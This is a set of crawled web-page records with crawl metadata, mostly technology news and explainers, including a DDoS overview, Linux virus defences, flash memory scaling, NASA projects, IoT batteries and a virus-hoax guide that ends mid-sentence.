NASA, Cisco develop new environmental monitor - By Patrick Marshall - Mar 09, 2009 NASA and Cisco Systems have announced they are jointly developing a new global environmental monitoring system, named Planetary Skin. They intend the system to be an online, collaborative application that will publish in near real time environmental data collected from satellites and airborne, sea-based and land-based sensors. The site — which will be available to government agencies, private companies and the public — will also include tools for analyzing and reporting the data. The first steps in developing Planetary Skin will be a series of pilot projects. One of the first projects will be Rainforest Skin, which will focus on the deforestation of rain forests. Developers will explore methods for building a sensor network to gather appropriate data. The team launched a Web site — www.planetaryskin.org — March 3 that will provide additional details about Planetary Skin and the pilot projects' progress. Patrick Marshall is a freelance technology writer for GCN.
<urn:uuid:4f74af7f-b1dd-4695-9815-77279f6d0660>
CC-MAIN-2017-09
https://gcn.com/articles/2009/03/09/update3-planetary-skin.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171176.3/warc/CC-MAIN-20170219104611-00329-ip-10-171-10-108.ec2.internal.warc.gz
en
0.922303
200
2.578125
3
What is a DDoS attack and how do you protect against DDoS Attacks? What is a DDoS attack? A DDoS (Distributed Denial of Service) attack is an attempt to exhaust the resources available to a network, application or service so that genuine users cannot gain access. Beginning in 2010, and driven in no small part by the rise of Hacktivism, we’ve seen a renaissance in DDoS attacks that has led to innovation in the areas of tools, targets and techniques. Today, DDoS has evolved into a series of attacks that include very high volume, along more subtle and difficult to detect attacks that target applications as well as existing security infrastructure such as firewalls and IPS. What are the different types of DDoS Attacks? DDoS attacks vary significantly, and there are thousands of different ways an attack can be carried out (attack vectors), but an attack vector will generally fall into one of three broad categories: Volumetric Attacks: Attempt to consume the bandwidth either within the target network/service, or between the target network/service and the rest of the Internet. These attacks are simply about causing congestion. TCP State-Exhaustion Attacks: These attacks attempt to consume the connection state tables which are present in many infrastructure components such as load-balancers, firewalls and the application servers themselves. Even high capacity devices capable of maintaining state on millions of connections can be taken down by these attacks. Application Layer Attacks: These target some aspect of an application or service at Layer-7. These are the most deadly kind of attacks as they can be very effective with as few as one attacking machine generating a low traffic rate (this makes these attacks very difficult to pro-actively detect and mitigate). These attacks have come to prevalence over the past three or four years and simple application layer flood attacks (HTTP GET flood etc.) have been one of the most common DDoS attacks seen in the wild. Today’s sophisticated attackers are blending volumetric, state exhaustion and application-layer attacks against infrastructure devices all in a single, sustained attack. These attacks are popular because they difficult to defend against and often highly effective. The problem doesn’t end there. According to Frost & Sullivan, DDoS attacks are innovation “increasingly being utilized as a diversionary tactic for targeted persistent attacks.” Attackers are launching DDoS attacks to distract the network and security teams while simultaneously trying to inject malware into the network with the goal of stealing IP and/or critical customer or financial information. Why are DDoS attacks so dangerous? DDoS represents a significant threat to business continuity. As organizations have grown more dependent on the Internet and web-based applications and services, availability has become as essential as electricity. DDoS is not only a threat to retailers, financial services and gaming companies with an obvious need for availability. DDoS attacks also target the mission critical business applications that your organization relies on to manage daily operations, such as email, salesforce automation, CRM and many others. Additionally, other industries, such as manufacturing, pharma and healthcare, have internal web properties that the supply chain and other business partners rely on for daily business operations. All of these are targets for today’s sophisticated attackers. What are the consequences of a successful DDoS attack? When a public facing website or application is unavailable, that can lead to angry customers, lost revenue and brand damage. When business critical applications become unavailable, operations and productivity grind to a halt. Internal websites that partners rely on means supply chain and production disruption. A successful DDoS attack also means that your organization has invited more attacks. You can expect attacks to continue until more robust defenses are deployed. What are your DDoS Protection Options? Given the high profile nature of DDoS attacks, and their potentially devastating consequences, many security vendors have suddenly started offering DDoS protection solutions. With so much riding on your decision, it is critical to understand the strengths, and weaknesses, of your options. Existing Infrastructure Solutions (Firewalls, Intrusion Detection/Protection Systems, Application Delivery Controllers / Load Balancers) IPS devices, firewalls and other security products are essential elements of a layered-defense strategy, but they are designed to solve security problems that are fundamentally different from dedicated DDoS detection and mitigation products. IPS devices, for example, block break-in attempts that cause data theft. Meanwhile, a firewall acts as policy enforcer to prevent unauthorized access to data. While such security products effectively address “network integrity and confidentiality,” they fail to address a fundamental concern regarding DDoS attacks—”network availability.” What’s more, IPS devices and firewalls are stateful, inline solutions, which means they are vulnerable to DDoS attacks and often become the targets themselves. Similar to IDS/IPS and firewalls, ADCs and load balancers have no broader network traffic visibility nor integrated threat intelligence and they are also stateful devices vulnerable state-exhausting attacks. The increase in state-exhausting volumetric threats and blended application-level attacks, makes ADC’s and load balancers a limited and partial solution for customers requiring best-of‐breed DDoS protection. Content Delivery Networks (CDN) The truth is a CDN can addresses the symptoms of a DDoS attack but simply absorbing these large volumes of data. It lets all the information in and through. All are welcome. There are three caveats here. The first is that there must be bandwidth available to absorb this high-volume traffic, and some of these volumetric-based attacks are exceeding 300 Gbps, and there is a price for all the capacity capability. Second, there are ways around the CDN. Not every webpage or asset will utilize the CDN. Third, a CDN cannot protect from an Application-based attack. So let the CDN do what it was intended to. What is Arbor’s approach to DDoS protection? Arbor has been protecting the world’s largest and most demanding networks from DDoS attacks for more than a decade. Arbor strongly believes that the best way to protect your resources from modern DDoS attacks is through a multi-layer deployment of purpose-built DDoS mitigation solutions. You need protection in the Cloud to stop today’s high volume attacks, which are exceeding 300GB/sec. You also need on-premise protection against stealthy application-layer attacks, and attacks against existing stateful infrastructure devices, such as firewall, IPS and ADCs. Only with a tightly integrated, multi-layer defense can you adequately protect your organization from the full spectrum of DDoS attacks. - Arbor Networks Cloud (Tightly integrated, multi-layer DDoS protection) - Arbor Networks APS (On-Premises) - Arbor Networks SP/TMS (High Capacity On-Premise Solution for Large Organizations) Arbor customers enjoy a considerable competitive advantage by giving them both a micro view of their own network, via our products, combined with a macro view of global Internet traffic, via our ATLAS threat intelligence infrastructure. This is a powerful combination of network security intelligence that is unrivaled today. From this unique vantage point, Arbor’s security research team is ideally positioned to deliver intelligence about DDoS, malware and botnets that threaten Internet infrastructure and network availability.
<urn:uuid:afc7c86e-4e58-4b23-84f7-d77d47c7efad>
CC-MAIN-2017-09
https://www.arbornetworks.com/what-is-a-ddos-attack-and-how-do-you-protect-against-ddos-attacks
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.92/warc/CC-MAIN-20170219104611-00505-ip-10-171-10-108.ec2.internal.warc.gz
en
0.944445
1,528
2.90625
3
Space junk problem: Is a solar-sail ship the answer? - By Kevin McCaney - Sep 26, 2011 A big reason NASA couldn’t predict exactly when and where its Upper Atmospheric Research Satellite (UARS) would fall to Earth last week was the effect solar activity had on its trajectory. Heat from the sun can cause the upper levels of the Earth’s atmosphere, the thermosphere, to warm and “puff up,” which creates a drag on satellites, NASA says on its website. And because the effects aren’t consistent, scientists could only estimate the six-ton satellite’s re-entry. UARS, a 20-year-old climate research satellite that had been out of commission for six years, finally came down, though the time and location is still uncertain. NASA estimates it hit between 11:23 p.m. EDT Sept. 23 and 1:09 a.m. Sept. 24 somewhere in the Pacific Ocean. The trail of debris that didn’t burn up in the atmosphere was probably spread over 500 miles. NASA’s falling satellite wasn’t always a hunk of junk But if solar activity can produce unpredictable results, it also can be harnessed, and NASA is planning to test one method that could, among other things, be used to clear orbital paths of the kind of space junk that UARS had become. The agency recently announced plans to test a large solar sail as part of its an upcoming round of Technology Demonstration Missions aimed at improving space communications, deep space navigation and in-space propulsion capabilities. Solar sails aren’t new, but this one will be seven times the size of any previously flown, which NASA says will increase its utility for jobs such as deep-space exploration, advanced geostorm warnings and removal of orbital debris. The sail, expected to be deployed in 2015 or 2016, is being developed by LeGarde Inc., in collaboration with NASA and the National Oceanic and Atmospheric Administration. Using the sun to provide thrust, the spacecraft would be able to navigate orbital paths and collected debris over a period of years. Future satellites also could have sails built in so that, when they’ve completed their missions, they can be taken out of orbit in an orderly way rather than becoming space junk themselves or falling to Earth and causing “Deep Impact” consternation. NASA says the sail also would allow solar-storm satellites to be positioned farther from Earth than current such satellites, which would increase warning times of solar storms from 15 minutes to 45 minutes, and the sails could provide propulsion for deep-space probes. Orbital debris, better known by the catchier name of space junk, is a growing problem in the upper atmosphere. The U.S. Space Surveillance Network tracks about 8,000 working and decommissioned satellites and other objects larger than 4 inches, and there are millions of other bits and pieces floating around. The biggest problem isn’t that the debris will eventually fall to Earth, since the vast majority of junk would burn up. But with that much congestion, active satellites and spacecraft could collide with other objects. In 2009, a defunct Russian spacecraft crashed into a working Iridium satellite, taking the satellite out of commission and creating more space junk. NASA, the military and other organizations have considered ways of getting rid of the debris, including using laser guns to slow down orbiting junk so that it would re-enter the atmosphere and burn up. But a solar-powered space schooner that collects bits as it sails by might be an even more efficient way of cleaning up the litter. Kevin McCaney is a former editor of Defense Systems and GCN.
<urn:uuid:73fecffa-1f19-474e-8ac2-29f789382ab2>
CC-MAIN-2017-09
https://gcn.com/articles/2011/09/26/nasa-solar-sail-cleaning-space-junk.aspx?sc_lang=en
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170993.54/warc/CC-MAIN-20170219104610-00501-ip-10-171-10-108.ec2.internal.warc.gz
en
0.948293
768
3.453125
3
Linux Viruses: Overview Viruses are, by definition, malicious pieces of code that replicate themselves. They can do this through a variety of methods, including "infecting" other executable files or spreading macros and other forms of executable content (e.g. JPEGs). Viruses are most commonly spread by users sharing files, which is especially easy with email, and with such a wide variety of content being available on Web and FTP servers. Most viruses do not really gain the author anything - they simply damage data and computer systems. Very few do anything, like stealing passwords or implementing backdoors (although this is changing, especially with distributed denial of service tools becoming very popular). Currently, the most common viruses are mostly macro viruses for Microsoft Office products like Word, Excel, and Access, for a number of reasons: Poor security controls on macros (you can turn them off, but many macro viruses re-enable macro support when run). File types such as DOC and XLS are commonly emailed around between people, so it isn't too suspicious to receive them via email. Almost all Windows computers have MS Office installed. It is remarkably easy to write these macro viruses, and even easier to modify them. There are other infection vectors for Linux. As with Windows, many users download third-party applications and install them (usually as root). It is trivial to create what looks like a legitimate program ("DVD ripper and VCD encoder for Linux version 2.34"). Many users will install it, and when it fails to work as expected, they may uninstall it or forget about it. Meanwhile, the virus payload has been delivered. Even legitimate programs can be subverted, and even though the most popular packaging format (RPM) supports digital signatures, very few users bother to check them. Software on popular sites has been Trojaned in past, and even though the PGP signature attached was completely bogus, it's usually downloaded by more than a few people before anyone actually checks it and alerts the site. There is some good news (not a whole lot though). If a user runs a program as a normal user account, chances are it cannot write to system binaries. This significantly decreases the effectiveness of viruses delivered via email or other data sources, since they can only modify a user's files and not infect the system. The reason this is so effective in Windows is that default file permissions in NT are "everybody - full control" (and many sites do not tighten this), and of course Windows 9x has no file permissions. The flip side of this is that most Linux machines have at least one (or many) local root exploits. Examples include Perl, mail, Sendmail, the Linux kernel itself, and much more. Unless an administrator keeps the machines up-to-date, a sophisticated virus could exploit a weakness and modify system files, or install Trojans and backdoors. Unfortunately, most machines are not kept up-to-date very well, and even if they are, there is a window of opportunity between vulnerabilities being reported and vendor upgrades being issued (although Linux has some of the lowest averages, in some cases ,<24 hours). This makes writing an effective virus for Linux harder than - but not much harder than - writing any old virus for Linux. The best defenses against Linux viruses are as follows: If possible, check the GnuPG or PGP signature on the RPM file, or the detached signature for tarballs and dpkg. You must get the GnuPG/PGP securely. Using a public keyserver is not terribly secure. Copying them off of a vendor's CD-ROM (such as SuSE) is an example of how to do it securely. Use " " to verify rpm's. To verify MD5 signatures, "md5sum" is used. The signatures must be gained from a trusted source such as a secure Web page. Download software from official sites or official mirror sites. While it's nice that people mirror software and make it available, there is an issue of trust. And since most people do not check package signatures, it is too easy for attackers to set up a site and merrily let people download software. Make regular backups, preferably several copies, and store them on write-protected media. Acquire an antivirus scanner and use it properly (more on this in the next article). SecurityPortal is the world's foremost on-line resource and services provider for companies and individuals concerned about protecting their information systems and networks. The Focal Point for Security on the Net (tm)
<urn:uuid:ffeb0d8f-4ae6-48ce-a0d0-d72c77fc8e4b>
CC-MAIN-2017-09
http://www.enterprisenetworkingplanet.com/print/netsecur/article.php/625211/Linux-Viruses-Overview.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171232.43/warc/CC-MAIN-20170219104611-00025-ip-10-171-10-108.ec2.internal.warc.gz
en
0.94035
937
3.5
4
A Computerworld article last week reported on a reseacher’s prediction that shrinking the size of NAND flash memory for solid-state drives (SSDs) may cause the technology to lose significance altogether. In a lecture delivered at this week’s Usenix Conference on File and Storage Technologies, Laura Grupp, a graduate student at the University of California, San Diego, argued that as flash memory is manufactured at smaller geometries, data errors and latency would increase. The idea behind shrinking the transistors is to boost capacity, which translates into lower cost per gigabyte. But that pushes performance and reliability in the opposite direction. Grupp wrote about the phenomenon in a study titled The Bleak Future of NAND Flash Memory. “While the growing capacity of SSDs and high IOP rates will make them attractive for many applications, the reduction in performance that is necessary to increase capacity while keeping costs in check may make it difficult for SSDs to scale as a viable technology for some applications,” she wrote. Grupp, along with John Davis of Microsoft Research and Steven Swanson of UCSD’s Non-Volatile Systems Lab, tested 45 types of NAND flash chips, spread across six vendors and multiple transistor geometries (between 25nm and 72nm). The researchers found that write speed for flash blocks had high variations in latency. In addition, they also discovered wide variations in error rates as the NAND flash wore out. Multi-level cell (MLC), and especially triple-level cell (TLC) NAND created the worst results, while single-level cell (SLC) performed the best. Grupp, Swanson and Davis extrapolated the results to 6.5nm technology, which is the size NAND transistors are expected to be in 2024. At that size, the researchers estimate that read/write latency will double in multi-level flash, with triple-level suffering 2.5 times as much latency. Bit error rates are expected to increase as well, more than tripling those of current levels. But since flash memory is a solid-state technology (versus the mechanical technology used in hard disks), SSDs will always have a natural advantage in speed and throughput. In general, reading and writing to an SSD is about 100 times faster than that of a hard drive. Grupp concedes that even with 2024-level transistor sizes, SSDs will outperform their hard disk competition by a wide margin, 32,000 IOPS to 200 IOPS, respectively. But because of the latency and error rate issues, she believes that 6.5nm will be end of the line for flash memory. For flash memory, there seems to be a choice of performance or capacity, but not both. This could have lasting impacts on data-intensive applications that lean heavily on IOPS performance. Without a replacement for NAND memory, performance could stall or even decline until another solid-state technology takes its place.
<urn:uuid:2f91c163-5f8e-47cb-9b42-8f81417eff1e>
CC-MAIN-2017-09
https://www.hpcwire.com/2012/02/22/flash_memory_shrinking_into_obscurity_/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00201-ip-10-171-10-108.ec2.internal.warc.gz
en
0.934919
610
3.015625
3
OTTAWA, ONTARIO--(Marketwired - Jan. 28, 2014) - Health Canada The Honorable Rona Ambrose, Minister of Health, and Eve Adams, Parliamentary Secretary to the Minister of Health today launched a Canada-wide consultation on ways to improve nutrition information on food labels by hosting a round table discussion with parents and consumers at the Parent Resource Centre in Ottawa. The consultation will focus on parents and consumers, and will include round table discussions in several Canadian cities, and an opportunity to participate online. The consultations provide a way for the Government of Canada to listen to Canadians, and to better understand how parents use nutrition information on food labels to make nutritious choices for their families. - Nutrition labelling became fully mandatory on prepackaged foods in Canada on December 12, 2007. This means that food companies have to include nutrition labelling on prepackaged foods. - Food labels provide information about the nutritional value of foods through the Nutrition Facts table, the list of ingredients, and health and nutrition claims found on packaging. - Canada is a world leader in the field of nutrition labelling and was one of the first countries to require mandatory nutrition labelling on pre-packaged foods. "As stated in the Speech from the Throne, our Government will consult with Canadian parents to improve the way information is presented on food labels. These consultations give our Government an opportunity to hear from parents about how to help families better understand and use food labels to make healthier food choices." |Minister of Health "The feedback we received today is just the beginning. We heard from parents about how important it is to have the tools they need to make healthy food choices." |Parliamentary Secretary to the Minister of Health "Proper food labelling is essential to make it easier for parents to make the healthiest choices in order to keep their children healthy." |Executive Director, Parent Resource Centre Health Canada - Nutrition Labelling Health Canada - The Nutrition Facts Table Healthy Canadians - The Percent Daily Value (%DV) Healthy Canadians - Healthy and Safe for Canadians Framework Health Canada - Food Labels Health Canada news releases are available on the Internet at: www.healthcanada.gc.ca/media
<urn:uuid:86620b49-7b13-4f18-a24c-1dea17fb3fa7>
CC-MAIN-2017-09
http://www.marketwired.com/press-release/harper-government-launches-consultation-with-parents-on-food-labels-1873258.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172649.58/warc/CC-MAIN-20170219104612-00553-ip-10-171-10-108.ec2.internal.warc.gz
en
0.920614
460
2.515625
3
In case you missed it... According to Top 500, the United States can claim to have the world's fastest supercomputer for the first time in three years. IBM's Sequoia has taken the title of the world's fastest supercomputer. The system is based on IBM's BlueGene/Q-server technology, and it packs about 1,572,864 processor cores with 1.6 petabytes of memory. Physically speaking, the supercomputer takes up about 3422 square feet of space spread out into 96 refrigerator-sized server racks. All this power lets Sequoia perform 16.32 quadrillion calculations per second (16.32 petaFLOPS). [ FREE DOWNLOAD: 6 things every IT person should know ] The previous record holder was Fujitsu's K-supercomputer, which topped 10.51 petaFLOPS last year in November. That computer ran off of 705,000 processor cores and was housed at Japan's Riken Advanced Institute for Computational Science in Kobe. IBM built its Sequoia supercomputer for the Department of Energy's Lawrence Livermore National Laboratory. The National Nuclear Security Administration will use Sequoia to produce simulation tests and help maintain the country's aging stockpile of nuclear weapons without the need for underground nuclear explosive testing. That sounds impressive and all, but can it run Crysis? Like this? You might also enjoy... - 3D Maps in iOS 6 Hacked to Run on iPhone 4, Doesn't Need Cydia - Live in a Mario Level With This 15-Foot-Long Poster - MIT Develops a Fuel Cell Implant That Runs on Sugar, Turns Carbs Into Electricity This story, "IBM builds the world's fastest supercomputer to help take care of our nukes" was originally published by PCWorld.
<urn:uuid:bc538cd6-51dc-47e2-94a8-c359592993b3>
CC-MAIN-2017-09
http://www.itworld.com/article/2722510/hardware/ibm-builds-the-world-s-fastest-supercomputer-to-help-take-care-of-our-nukes.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171251.27/warc/CC-MAIN-20170219104611-00373-ip-10-171-10-108.ec2.internal.warc.gz
en
0.896181
373
2.640625
3
NASA open-source project gains Apache's top-level status Agency's Object Oriented Data Technology is recognized as a Top-Level Project by the open-source flagship - By Dan Rowinski - Jan 05, 2011 An open-source project by NASA's Jet Propulsion Laboratory has gained the support of the Apache Software Foundation as a Top-Level Project. Object Oriented Data Technology (OODT) is a data-sharing architecture NASA developed to use metadata to seek out disparate and geographically dispersed data sources for access by any user. It was developed for that purpose in 1998 and has evolved in the past 12 years to accommodate data sharing among several NASA Earth science projects, including the NPOESS Preparatory Project, a joint effort by NASA, the Defense Department and the National Oceanic and Atmospheric Administration, and the Soil Moisture Active and Passive test bed. "Each database is broken into a different data type," said Chris Mattmann, a senior computer scientist at the Jet Propulsion Lab. "The system collects data with different technology and turns it into an online entry point that allows people to search across datasets." OODT’s primary use is to allow scientists and academicians to conduct deep research in the databases without having to start from scratch for every search. Mattmann said the foundation and the lab have configured OODT to also allow users to add data to the sets. "One thing that we are currently focused on is a way to intuitively extract data, allow its use to target our users more effectively," Mattmann said. "We are also working toward improving the graphical user interfaces." NASA lab: Cloud is safe for mission-critical data Why consolidation will boost use of open-source systems One interesting use for OODT outside Earth science and planetary datasets is in the realm of health IT. The Jet Propulsion Lab received a grant from the National Institutes of Health to perform informatics and other data functions for Children’s Hospital in Los Angeles. Specifically, the lab has been using OODT to support the hospital’s Virtual Pediatric Intensive Care Unit. OODT acts as middleware code written primarily in Java. Its architecture can handle computer processing workflow, hardware and file management, information integration, and database links. It also has several Java and Python-based application programming interfaces that allow users to easily interact with the system, according to the Jet Propulsion Lab. Now that it has been recognized as a Top-Level Project by the Apache Software Foundation, OODT can receive project management and resource support from the foundation. After some research, NASA chose to make the code open source and enlisted the Apache Software Foundation’s help in January 2010. That partnership opened up the code to a community of 3,500 open-source developers who are diligent in providing quality "We regularly used open-source software in our daily [lab] tasks and were impressed with the quality of code and vibrant nature of free and open-source software communities," Mattmann said in the Jet Propulsion The group’s open-source community can help OODT become a more robust architecture and quicken the pace of development because more developers can work with the code at the same time. OODT is the first open-source project to be awarded Top-Level Project designation by the Apache Software Foundation. Fewer than 100 software packages have that designation, making OODT part of a prestigious group. The Apache Software Foundation is the flagship open-source community and powers the Apache HTTP Server, which runs most of the technology behind Dan Rowinski is a staff reporter covering communications technologies.
<urn:uuid:ecc19b5e-70d9-4c1d-beb5-f7a34e86823f>
CC-MAIN-2017-09
https://gcn.com/articles/2011/01/05/apache-software-foundation-recognizes-nasa-project.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00549-ip-10-171-10-108.ec2.internal.warc.gz
en
0.920757
773
2.6875
3
Battery issues are the Achilles’ heel of the IoT. Whether you are trying to manage remote sensors with a small battery, or you want to harness the power of the sun and store the energy in the smart grid, battery solutions represent the driver for your network architecture and your cost models. As usual with The Hot List, we have to talk about what is included and what is excluded. The theme of The IoT Battery Hot List is power storage, so power converters and uninterruptable power supplies are excluded. The result is that several brand names are not included in this specific discussion. Included are batteries using various chemicals, fuel cells, and power cells. This means that alternative energy is not specifically in this discussion, while traditional battery companies are included. In some ways talking about The Hot List with batteries is a bad idea. We all know about the Samsung Galaxy 7, whose lithium Ion battery would catch on fire. While Samsung is the latest news, the problem with battery fires and general recycling was the catalyst for many start-ups and failures. Moving away from lithium was the vision for A123 Systems, which was a flagship for U.S. government and MIT technology. However, the advances and immediate buzz was short lived. The delays with battery research turning into products sales resulted in a lot of acquisitions. The result was that the company that was to be a flagship crashed and was rescued by a Wanxiang Group. Almost all the companies involved with battery research are now in privately-held funds. A123 Systems is a leader in mixed materials Lithium Iron Phosphate (LFP) and Nickel Manganese Cobalt (NMC); it is not a market leader. However all the applications A123 Systems is focused on are IoT related. Warren Buffet, who already owns Duracell, put his battery investments into BYD, a Chinese company that focuses on the needs of the electronic vehicle market. The research has yielded more opportunities and expanded storage into alternative markets. One of the largest markets for batteries these days is the emerging space of electronic vehicles. Panasonic is Tesla’s partner in battery development, and the new factory being built in Reno, Nev., is innovating on product size if not chemical materials. According to a Fortune article, Tesla looked at how to bring the cost of batteries down and decided that conventional size (i.e., 18-650) of lithium-ion batteries was too small. “For example, if you make a lithium-ion battery bigger, it could store more energy and produce more power. However, longer and wider batteries could mean that the battery pack (which collects individual battery cells together) could be wider or heavier, which could constrain the design or range of the car. But the Tesla team seams satisfied with settling on the 21-70 formats for its lithium-ion batteries for its Model 3 cars. In fact, Tesla fancies the 21-70 formats so much that it could even consider one day using those batteries for its older car models. Musk said that after Tesla gets the Model 3 out the door it will revisit whether or not it wants to make new Model X cars with the 21-70 batteries.” Supporting the charging of electronics cars makes the smart grid distributed solutions in smart cities critical. This means a change in the peak usage hours with the need to charge auto batteries and store energy. According to Tom Rebbeck of Analysis Mason, “More utilities will embrace energy transition fundamentals and adopt new operational and service models, supported by new technology. Advances in technology have fundamentally changed the economics of providing energy and are disrupting the historical model for distribution through development of the distribution service operator or on-demand utility model. Cities represent 78 percent of global energy demand at present, placing the smart-city concept at the heart of the climate change agenda.” This will translate into more energy storage by transmission sub stations and on-premises offerings by the utilities for large facilities. Rebbeck goes on to point out that “advances in technology have fundamentally changed the economics of providing energy and are disrupting the historical model for distribution through development of the distribution service operator or on-demand utility model.” One company that recognizes its role in IoT is ABB, which acquired Power-One and has been integrating its battery solutions into the smart grid. ABB did a recent survey of utility companies, and it’s clear that battery storage within the grid is going to increase significantly. Doosan Fuel Cell was established in 2014 when Doosan Corp. made two strategic initiatives in the fuel cell market – acquiring the assets of ClearEdge Power, a fuel cell technology leader in the United States, and merging with Fuel Cell Power, a residential fuel cell leader in Korea. Off-the-grid environments like remote monitoring solutions for oil and gas equally want to reduce the cost of transmission. Enabling remote devices to stay connected without truckrolls and hands-on maintenance is an essential element to widespread adoption of IoT. The result is that low power wide range and alternatives solutions like Sigfox, and RPMA from Ingenu are being deployed. This represents the second new market and is one of the reasons new categories of antenna have been created for LTE deployments as well. Markku Rouvala from New Nordic Engineering shared that battery- powered ultra-low power electronics processes have created a new class of electronics devices. In this new world, tiny processors with smart electronics are drivers instead of maximum processing power. “While low power sensor radio technologies are enabling sensor nodes to be connected within tens or hundreds of meters to each other, ultra-low power sensor technologies are enabling these nodes to run for years, even tens of years on the primary battery, i.e. without charging.” Protocol selection sensor node battery life depends on the radio transmission distance. At the moment, IoT radio protocol standardization is experiencing such hype, that it is almost impossible to predict the winner of it all, and it is necessary in many cases to support multiple protocols. For very small power requiring sensors, like 1uA or below, 100nA in the idle, even small batteries, the size of CR2032 can power the sensor device for a very long time, like five to 10 years, or more. When more than 10 years of lifetime is be required, the battery chemistry itself becomes more important, and special chemistries are needed to make the shelf life long enough. What is clear is that battery strategies are driving IoT solutions out into field and on the road. Here is The Hot List A123 Systems LLC develops and manufactures advanced Nanophosphate lithium iron phosphate batteries and energy storage systems that deliver high power, maximize usable energy, and provide long life, all with excellent safety performance. A123 Systems is a TS-16949 and ISO9001 certified supplier of advanced lithium ion cells and systems designed to help customers quickly and cost effectively take engineering breakthroughs from conception to commercialization. ABB is a leader in power and automation technologies that enable utility, industry, and transport and infrastructure customers to improve their performance while lowering environmental impact. The ABB Group of companies operates in roughly 100 countries and employs about 135,000 people. BYD is the global leader and innovator in battery technology and one of the top three largest battery manufacturers in the world. It develops large-scale, grid-connected, energy storage systems, distributed energy storage systems, and micro-grid storage systems for commercial and home customers around the world. BYD’s unique battery chemistry makes it the safest choice for energy storage available on the market today. The BYD Iron-Phosphate battery passes every international standard for battery safety testing available – an accomplishment it says is unmatched in the industry. C&D Technologies Inc. produces and markets systems for the power conversion and storage of electrical power, including industrial batteries and electronics. This specialized focus has established the company as a leading and valued supplier of products in reserve power systems and electronic power supplies. Cummins Power Generation Business is a global provider of power generation systems, components, and services in standby power, distributed power generation, as well as auxiliary power in mobile applications to meet the needs of a diversified customer base. Cummins Power Generation also provides a full range of services and solutions, including long-term operation and maintenance contracts and turnkey and temporary power solutions. Doosan manufactures and markets high-performance fuel cell solutions that provide combined cooling, heat, and power. In the United States it provides cost competitive, clean, reliable energy solutions for customers that need secure uninterrupted power, even during blackouts, for their commercial buildings, industrial plants, data centers, hospitals, and universities. In Korea it produces compact fuel cells for residential use, while strengthening its position in the large power generation sector, in line with government policy on renewable energy provisions. Started in the 1920s, the Duracell brand and company was recently acquired by Berkshire Hathaway Inc. and has grown to be the leader in the single-use battery market in North America. The iconic Duracell brand is known the world over. Its products serve as the heart of devices that keep people connected, protect their families, entertain them, and simplify their increasingly mobile lifestyles. It also offers recharging technology. Berkshire Hathaway is a $210 billion holding company owning subsidiaries that engage in diverse business activities. EaglePicher Technologies is an industry leader in integrated power solutions. Demands on technology call for batteries and devices that are both smaller and lighter, yet deliver more energy while increasing safety. EaglePicher meets these needs. EnerDel designs, builds, and manufactures lithium-ion energy storage solutions and battery systems with a focus on heavy duty transportation, on- and off-grid electrical, mass transit and task-oriented applications. EnerDel’s product suite delivers energy-dense solutions for both high-power and high-energy applications, including one of the highest energy-dense cells in the industry. The company says it uses superior materials for added safety and better performance. EnerSys is the global leader in stored energy solutions for industrial applications. It manufactures and distributes reserve power and motive power batteries, battery chargers, power equipment, battery accessories, and outdoor equipment enclosure solutions that are used worldwide. It also manufactures and sells related direct current power products including chargers, electronic power equipment, and a wide variety of battery accessories. Energizer offers a full range of long-lasting miniature batteries for use in watches, cameras, glucose monitors, pedometers, remote control or other small devices. Exide Technologies is a global provider of stored electrical energy solutions – batteries and associated equipment and services for transportation and industrial markets. The Exide Transportation business manufactures and markets starting, deep-cycle, and micro-hybrid batteries for automotive, light and heavy-duty truck, agricultural, marine, military, powersport, and other specialty applications. The power of Panasonic Industrial Devices brings strategic innovations to customers’ product development processes. Many products sold by Fortune 500 companies are by Panasonic technology. Valence Technology Inc. is a privately held corporation organized under the laws of the State of Delaware in the U.S. Founded in 1989, Valence Technology developed the industry’s first commercially available, safe, large-format family of lithium iron magnesium phosphate rechargeable batteries. Edited by Ken Briodagh
<urn:uuid:7d746fb3-a68e-42cd-a408-6db64ac00d4a>
CC-MAIN-2017-09
http://www.iotevolutionmagazine.com/column/articles/429354-iot-batteries.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174163.72/warc/CC-MAIN-20170219104614-00425-ip-10-171-10-108.ec2.internal.warc.gz
en
0.945614
2,330
2.515625
3
A study-guide on how to detect a virus hoax yourself It is difficult to imagine anybody today who does not treat computer viruses as a real threat to a regularly functioning computer system. However, contiguously with the virus spreading has occurred another syndrome, which is not any less dangerous - virus hoaxes. The idea of a virus hoax is simple: an offender fabricates a warning about an extremely dangerous virus that actually does not exist at all. After that, he sends the hoax to as many users as possible, asking them to take appropriate measures and to forward the message to others. Scared users, doing their best, inform all their colleagues and partners. As a result, the computer world is constantly agitated by bursts of virus hysteria, alarming tens of thousands of people all around the world. The "heyday" of the virus hoax was 1997-1998 when nearly every month, anti-virus companies were struck by a huge wave of e-mail from frightened users. As a result, these same anti-virus companies had to release soothing "calm down" articles. How can you recognize a real virus warning from a hoax? And what do you do should your friends believe this bad joke? The main rule: If the message did not come directly from an anti-virus-developer news service, then you should check the hoax sections at specialised Internet resources. We recommend you subscribe to the Kaspersky Lab Virus Encyclopaedia or check Rob Rosenberger's popular Virus Myths & Hoaxes Web site at VMyths.com. In case you don't find the virus alert you have received on these pages, then you should visit the news section on Kaspersky Lab Web site. Our experts are very fast in delivering breaking news about the latest virus outbreaks. Should there be any new outbreaks, you will find a corresponding notification at www.viruslist.com. In the event that you fail to locate any details regarding the virus mentioned in the alert, you should send a request to Kaspersky Lab technical support (email@example.com) for clarification. What should you do if you have received a real virus hoax? Firstly, do not forward it to anyone else. The best way of handling such messages is to delete them immediately. Secondly, as fast as you can, notify the sender that he has fallen victim to a virus hoax. There is still a possibility he hasn't managed to send the "virus alert" to others, so by informing him of his error, you are helping him save his credibility for not crying "wolf," causing friends and colleagues unnecessary nerve-wracking moments. In addition, it also needs to be mentioned that virus hoaxes carry an even more dangerous payload than simply scaring people with hollow alerts. It is possible that at sometime, a malefactor will write a virus, utilizing 